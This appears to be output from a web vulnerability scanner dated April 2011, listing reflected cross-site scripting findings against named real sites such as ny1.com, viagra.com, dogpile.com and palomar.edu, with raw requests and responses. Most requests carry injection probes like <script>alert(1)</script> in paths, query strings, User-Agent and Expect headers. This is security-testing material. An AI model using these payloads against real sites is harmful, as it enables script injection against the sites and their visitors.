GET /App_Skinscb45a'%3b3be91b1fed6/news1/favicon.ico HTTP/1.1 Host: www.ny1.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:10:53 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56055 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:20:57 GMT Date: Fri, 01 Apr 2011 18:10:57 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://www.ny1.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ny1.com |
Path: | /App_Skins/news1/favicon |
GET /App_Skins/news1b9307'%3b60ed35259b0/favicon.ico HTTP/1.1 Host: www.ny1.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:04 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56061 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:21:09 GMT Date: Fri, 01 Apr 2011 18:11:09 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://www.ny1.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ny1.com |
Path: | /App_Skins/news1/favicon |
GET /App_Skins/news1/favicon Host: www.ny1.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:15 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56154 Vary: Accept-Encoding Cache-Control: public, max-age=594 Expires: Fri, 01 Apr 2011 18:21:10 GMT Date: Fri, 01 Apr 2011 18:11:16 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/App ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ny1.com |
Path: | /Content/ServeContent |
GET /Content741cc'%3b7ff253c1040/ServeContent.aspx?id=694 Host: www.ny1.com Proxy-Connection: keep-alive Referer: http://www.ny1.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:10:30 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56103 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:20:35 GMT Date: Fri, 01 Apr 2011 18:10:35 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content741cc';7ff253c1040/ServeContent.aspx'; var gRegionSelected = '1';//]]> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ny1.com |
Path: | /Content/ServeContent |
GET /Content/ServeContent Host: www.ny1.com Proxy-Connection: keep-alive Referer: http://www.ny1.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:10:35 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56151 Vary: Accept-Encoding Cache-Control: public, max-age=562 Expires: Fri, 01 Apr 2011 18:20:02 GMT Date: Fri, 01 Apr 2011 18:10:40 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ny1.com |
Path: | /Content/ServeResource |
GET /Content9b61d'%3b29e3180e9f2/ServeResource.aspx?id Host: www.ny1.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:10:37 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56111 Vary: Accept-Encoding Cache-Control: public, max-age=561 Expires: Fri, 01 Apr 2011 18:20:02 GMT Date: Fri, 01 Apr 2011 18:10:41 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content9b61d';29e3180e9f2/ServeResource.aspx'; var gRegionSelected = '1';//]]> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ny1.com |
Path: | /Content/ServeResource |
GET /Content/ServeResource Host: www.ny1.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:10:42 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56157 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:20:46 GMT Date: Fri, 01 Apr 2011 18:10:46 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ny1.com |
Path: | /favicon.ico |
GET /favicon.ico?80003'-alert Host: www.ny1.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:01 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56138 Vary: Accept-Encoding Cache-Control: public, max-age=590 Expires: Fri, 01 Apr 2011 18:20:55 GMT Date: Fri, 01 Apr 2011 18:11:05 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://www.ny1.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ny1.com |
Path: | /favicon.ico |
GET /favicon.ico2f09d'%3b2cbc36dd419 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ny1.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 15:47:33 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56403 Vary: Accept-Encoding Cache-Control: public, max-age=571 Expires: Fri, 01 Apr 2011 15:57:09 GMT Date: Fri, 01 Apr 2011 15:47:38 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/favicon ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ny1.com |
Path: | /favicon.ico |
GET /favicon.ico?80003'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ny1.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 15:47:27 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56353 Vary: Accept-Encoding Cache-Control: public, max-age=592 Expires: Fri, 01 Apr 2011 15:57:21 GMT Date: Fri, 01 Apr 2011 15:47:29 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://www.ny1.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ottawacitizen |
Path: | /favicon.ico |
GET /19e72'%3b535a1938ce9 HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ottawacitizen.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Fri, 01 Apr 2011 15:39:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 01 Apr 2011 15:39:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 130661 ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.quickyellow |
Path: | /favicon.ico |
GET /favicon.ico?c0f13<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.quickyellow.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 403 Forbidden Date: Fri, 01 Apr 2011 16:32:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://www.quickyellow Content-Length: 285 Content-type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1><p>You don't have permission to access http://www.quickyellow on this server.</p> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.swiftpage1.com |
Path: | /favicon.ico |
GET /favicon.ico360a1%253cscript User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.swiftpage1.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 File Not Found Date: Fri, 01 Apr 2011 17:25:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 592 <html> <head> <title>404 File Not Found</title> </head> <body> <H1>404 File Not Found</H1> <br><br><br><br> Full URL: http://www.swiftpage1.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.swiftpage1.com |
Path: | /favicon.ico |
GET /favicon.ico?644d8<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.swiftpage1.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 File Not Found Date: Fri, 01 Apr 2011 17:25:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 592 <html> <head> <title>404 File Not Found</title> </head> <body> <H1>404 File Not Found</H1> <br><br><br><br> Full URL: http://www.swiftpage1.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.viagra.com |
Path: | /favicon.ico |
GET /favicon.icoebdb6'%3b238a37bb66d HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.viagra.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 17076 Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Fri, 01 Apr 2011 15:49:14 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> 40 ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName='http://www s.pageType='errorPage'; s.prop1='page error'; s.prop3='error:404'; s.prop5=''; /* Conversion Variables */ s.campaign=''; s.events='7:pageview'; s.eVar3='error:404'; s.eVar5=''; s.eVar6=''; s.eVar18= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.viagra.com |
Path: | /favicon.ico |
GET /favicon.ico?92bef'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.viagra.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 17089 Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Fri, 01 Apr 2011 15:49:13 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> 40 ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName='http://www s.pageType='errorPage'; s.prop1='page error'; s.prop3='error:404'; s.prop5=''; /* Conversion Variables */ s.campaign=''; s.events='7:pageview'; s.eVar3='error:404'; s.eVar5=''; s.eVar6=''; s.eVar1 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://community.dogpile |
Path: | / |
GET / HTTP/1.1 Host: community.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.168f6b4"-alert(1)- Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Connection: close Date: Fri, 01 Apr 2011 17:12:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.8 Set-Cookie: RescueUserProfile Set-Cookie: RescueSession=ActionId Last-Modified: Fri, 1 Apr 2011 17:12:13 GMT Expires: Fri, 1 Apr 2011 17:12:13 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Dogpi ...[SNIP]... <![CDATA[ var userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.168f6b4"-alert(1)- var clientIP = "173.193.214.243"; // ]]> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://support.dogpile |
Path: | /pressroom/ |
GET /pressroom/ HTTP/1.1 Host: support.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.163e495"-alert(1)- Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Connection: close Date: Fri, 01 Apr 2011 17:12:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.8 Set-Cookie: RescueUserProfile Set-Cookie: RescueSession=ActionId Last-Modified: Fri, 1 Apr 2011 17:12:15 GMT Expires: Fri, 1 Apr 2011 17:12:15 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html ...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Do ...[SNIP]... <![CDATA[ var userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.163e495"-alert(1)- var clientIP = "173.193.214.243"; // ]]> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.blacksingles |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.blacksingles.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 16:32:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: al-amho=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/ Set-Cookie: al-juso=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/ Set-Cookie: SparkUPS=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/ Set-Cookie: OmnitureSessionCheck=2011 Set-Cookie: REG091202=REG091202&prm Set-Cookie: mnc5=sid=29782a70-8f42 Set-Cookie: mnc5_PromotionID=objname Set-Cookie: mnc5_Luggage=objname Cache-Control: no-store Content-Type: text/html; charset=utf-8 Content-Length: 72510 Set-Cookie: NSC_wjq_hmpcbm.tqbsl.dpn <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... s.prop23 = (clearValue) ? "" : ""; s.prop24 = (clearValue) ? "" : ""; s.prop27 = (clearValue) ? "" : ""; s.prop29 = (clearValue) ? "" : "http://www.google.com s.prop30 = (clearValue) ? "" : ""; s.prop31 = (clearValue) ? "" : ""; s.prop32 = (clearValue) ? "" : ""; s.prop33 = (clearValue) ? "" : ""; s.prop36 = (c ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.palomar.edu |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.palomar.edu Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 16:27:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4692 <html> <head> <meta http-equiv="Content <meta name="GENERATOR" content="Microsoft FrontPage 6.0"> <meta name="ProgId" content="FrontPage.Editor <titl ...[SNIP]... <br> REFERER - http://www.google.com <hr width="85%" align="center"> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.palomar.edu |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3b46a4<script>alert(1)< Host: www.palomar.edu Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 16:27:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4655 <html> <head> <meta http-equiv="Content <meta name="GENERATOR" content="Microsoft FrontPage 6.0"> <meta name="ProgId" content="FrontPage.Editor <titl ...[SNIP]... <br> BROWSER - curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3b46a4<script>alert(1)< <br> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/ns.androidtapp |
GET /cmadj/ns.androidtapp Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7ea575'%3balert(1)/ |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7302 Date: Fri, 01 Apr 2011 18:15:56 GMT Connection: close function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://dogpile.com |
Path: | /dogpile/ws/preferences |
GET /dogpile/ws/preferences Host: dogpile.com Proxy-Connection: keep-alive Referer: http://dogpile.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Fri, 01 Apr 2011 16:55:36 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:55:36 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 50685 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:11:33 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_04-01-2011 Set-Cookie: 480-VT=drive_03-24-2011 Set-Cookie: 480-nUID=adcon_13920 Content-Length: 6699 Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ].loadNewP();this ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.8tracks.com |
Path: | /favicon.ico |
GET /favicon.ico95c41<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.8tracks.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 301 Moved Permanently Content-Type: application/octet-stream Connection: close Status: 301 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10 Location: http://8tracks.com Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack) Content-Length: 170 Redirecting to <a href="http://8tracks.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.8tracks.com |
Path: | /favicon.ico |
GET /favicon.icofb7fd"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.8tracks.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 301 Moved Permanently Content-Type: application/octet-stream Connection: close Status: 301 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10 Location: http://8tracks.com Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack) Content-Length: 176 Redirecting to <a href="http://8tracks.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile/ws/about/ |
GET /dogpile/ws/about/ Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3741881610 |
